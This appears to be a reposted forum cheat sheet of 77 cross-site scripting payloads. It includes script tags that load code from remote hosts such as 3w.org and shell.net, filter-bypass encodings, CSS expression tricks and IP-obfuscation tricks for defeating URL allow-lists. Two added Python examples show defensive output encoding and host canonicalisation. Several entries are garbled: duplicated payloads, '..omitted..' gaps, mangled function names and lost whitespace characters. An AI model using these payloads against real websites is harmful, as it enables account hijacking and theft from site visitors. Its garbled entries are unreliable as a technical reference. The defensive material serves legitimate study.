It seems there is not much material about XSS on t00ls, so I am copying over something good I came across, in case any of you want to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab character, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective in China, since there is nowhere they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with leading spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript escape filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
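
Items (29) and (30) are context-breakout payloads: (29) defeats a filter that only backslash-escapes double quotes, because its leading backslash neutralises the one the filter inserts; (30) closes the element the data was placed in. The added example below is not from the original post. It shows the naive filter failing beside a context-aware encoder: JSON quoting for a JavaScript string literal (with `<`, `>`, `&` and `/` written as escapes so the literal can never contain a closing tag) and HTML entity encoding for text nodes such as `<title>`. The helper names and the rendering templates are constructed for this illustration.

```python
import html
import json

# Added example, not from the original post.


def naive_js_escape(value: str) -> str:
    """The kind of filter item (29) is written against: only the double quote is escaped."""
    return value.replace('"', '\\"')


def js_string_literal(value: str) -> str:
    """Encode untrusted data as a JavaScript string literal inside an HTML <script>.

    json.dumps escapes backslashes and quotes, so a leading backslash in the data
    cannot cancel the escape of the following quote; <, >, & and / are then written
    as escapes so the HTML parser never sees a closing </script> inside the literal.
    """
    encoded = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"), ("/", "\\/")):
        encoded = encoded.replace(ch, esc)
    return encoded


def html_text(value: str) -> str:
    """Encode for an HTML text node such as the content of <title> (item 30)."""
    return html.escape(value, quote=True)


def render_script_naive(user_value: str) -> str:
    return '<script>var t = "' + naive_js_escape(user_value) + '";</script>'


def render_script(user_value: str) -> str:
    return "<script>var t = " + js_string_literal(user_value) + ";</script>"


def render_title(user_title: str) -> str:
    return "<title>" + html_text(user_title) + "</title>"


def unescaped_quote_count(js_source: str) -> int:
    """Count double quotes that are not escaped by a preceding backslash.

    One string literal contributes exactly two; a higher count means the
    untrusted value closed the literal early and the rest runs as code.
    """
    count, i = 0, 0
    while i < len(js_source):
        ch = js_source[i]
        if ch == "\\":
            i += 2          # skip the escaped character, whatever it is
            continue
        if ch == '"':
            count += 1
        i += 1
    return count


# Constructed inputs: the payloads of items (29) and (30) as Python literals.
PAYLOAD_29 = "\\\";alert('XSS');//"                 # the text  \";alert('XSS');//
PAYLOAD_30 = "</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>"
```

With the naive filter, `render_script_naive(PAYLOAD_29)` produces `var t = "\\";alert('XSS');//";`, where `\\` is an escaped backslash and the next quote ends the literal; the JSON-based encoder yields `"\\\";alert('XSS');\/\/"`, a single literal. For item (30), entity encoding the title leaves exactly one real `</title>` in the output and no `<script` at all.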

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL link
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript in Flash, your XSS code can be smuggled in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
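
Items (68) to (73) are not XSS payloads themselves but ways of writing a host so that a string-based URL allow-list does not recognise it: a single 32-bit decimal, hex or octal components, mixed notations, and whitespace that the browser discards. The defence is to compare the canonical host rather than the raw string. The example below is added here and is not from the original post; it implements the inet_aton-style rules (0x prefix is hex, leading 0 is octal, the last component fills the remaining bytes) and the same control-character stripping a browser applies. Function names, the allow-list and the sample URLs are constructed; item (73) is rebuilt with tabs and a newline, which is what the spaces on the page stand for.

```python
import html
import ipaddress
import re
from urllib.parse import urlsplit

# Added example, not from the original post.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def _parse_part(part: str) -> int:
    """One dotted component, read the way inet_aton() does:
    a 0x prefix means hex, a leading 0 means octal, anything else is decimal."""
    p = part.lower()
    if p.startswith("0x"):
        return int(p[2:] or "0", 16)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)
    return int(p, 10)


def canonical_ipv4(host: str):
    """Dotted-quad form of any inet_aton-style literal, or None if host is not one.
    One to four components are accepted; the last component fills the remaining
    bytes, which is why a single number such as 3232235521 is a valid address."""
    parts = host.split(".")
    if len(parts) > 4 or not all(parts):
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None                      # a name such as www.google.com
    if any(v > 255 for v in values[:-1]):
        return None
    tail_bytes = 4 - (len(values) - 1)
    if values[-1] >= 1 << (8 * tail_bytes):
        return None
    number = 0
    for v in values[:-1]:
        number = (number << 8) | v
    number = (number << (8 * tail_bytes)) | values[-1]
    return str(ipaddress.IPv4Address(number))


def canonical_host(url: str) -> str:
    """The host as the browser will resolve it: entities decoded, control
    characters dropped, scheme-less URLs given a scheme, case and trailing
    dot removed, numeric literals converted to dotted-quad."""
    cleaned = _CONTROL_CHARS.sub("", html.unescape(url)).strip()
    if cleaned.startswith("//"):
        cleaned = "http:" + cleaned                                  # item (74)
    host = (urlsplit(cleaned).hostname or "").lower().rstrip(".")   # item (76)
    return canonical_ipv4(host) or host


def is_allowed(url: str, allowed_hosts) -> bool:
    """Allow-list comparison on the canonical host, never on the raw string."""
    return canonical_host(url) in allowed_hosts


# Constructed samples modelled on items (68)-(76), mapped to their canonical host.
ALLOWED = {"www.google.com", "66.102.7.147"}
SAMPLES = {
    "http://3232235521": "192.168.0.1",
    "http://0xc0.0xa8.0x00.0x01": "192.168.0.1",
    "http://0300.0250.0000.0001": "192.168.0.1",
    "h\ntt\tp://6\t6.000146.0x7.147/": "66.102.7.147",
    "//www.google.com/": "www.google.com",
    "http://www.google.com./": "www.google.com",
}
```

All three numeric spellings in items (70) to (72) canonicalise to 192.168.0.1, and the mixed form in item (73) to 66.102.7.147, so an allow-list keyed on canonical hosts treats them the same way it treats the plain dotted form. Any URL whose host cannot be canonicalised at all is simply not in the set and is refused.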

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>